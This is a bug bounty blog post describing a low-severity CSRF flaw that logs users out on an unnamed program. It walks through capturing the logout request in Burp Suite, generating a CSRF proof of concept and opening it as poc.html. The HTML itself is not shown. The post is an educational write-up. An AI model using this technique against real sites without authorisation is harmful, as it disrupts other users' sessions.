BUG POC

BUG POC -> CSRF Leads to Logout Users

BUG POC -> CSRF Leads to Logout Users

Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will learn about the BUG, which I have recently founded on a private bug bounty program let’s name it https://example.com“.

The vulnerability was based on “CSRF(Cross-Site Request Forgery)” usually normal people always use the CSRF technique to change password parameters but it can be used at various places

  • Password change function
  • Logout function
  • email address change function
  • Phone number change function
  • Money Transfer,etc.

So it starts with Login functionality, first, we need to log in to an account as an attacker, and after that simply Log out of the account. Before that “on interception” in Burp Suite.

Once you click on the “Logout” button the Burp Suite will capture the request.

This is the intercepted request of the Logout function and now we need to make a csrf POC to send that request to the victim.

Now someone will say, sometimes there is a CSRF token that will protect this. yes!! I agree with that, for Patching the CSRF vulnerability developers always uses a CSRF token…

But sometimes the CSRF token may get misconfigured and that will be very beneficial to Attackers.

Now we move further, once you intercept the request right-click there or use the Action button up there to create CSRF POC.

Action tab -> Engagement tools -> Generate CSRF POC

Once you click on the generate CSRF POC a new interface of Burp Suite will open up with CSRF POC we need to copy that “HTML” code.

Copy the Html code and paste anywhere, the HTML code looks like this

Now save this as “html” extension like poc.html, etc…

I have saved this and after that, I now logged in to another browser with a different account.

After that open that poc.html file in the browser where you have logged in, you will see this kind of view or something a bit different.

Hit on submit button and refresh the account page you will see that you are logged out from there

Boom!! you have achieved success and even found a LOW-level BUG, which can pay you up to 200$…

It’s over for today and now time to say GOODBYE for now

Happy Hacking!!

Share this post

About the author

4 comments

  1. Did you report this on HackerOne?
    I reported many programs via this POC but the HackerOne was rejected this bug.
    Would you share your report on the HackerOne website?
    Thanks

  2. I feel that you’re on the right course with your blog site. You’ve got a considerable amount of fascinating material that new viewers may enjoy.

Leave a Reply

Your email address will not be published. Required fields are marked *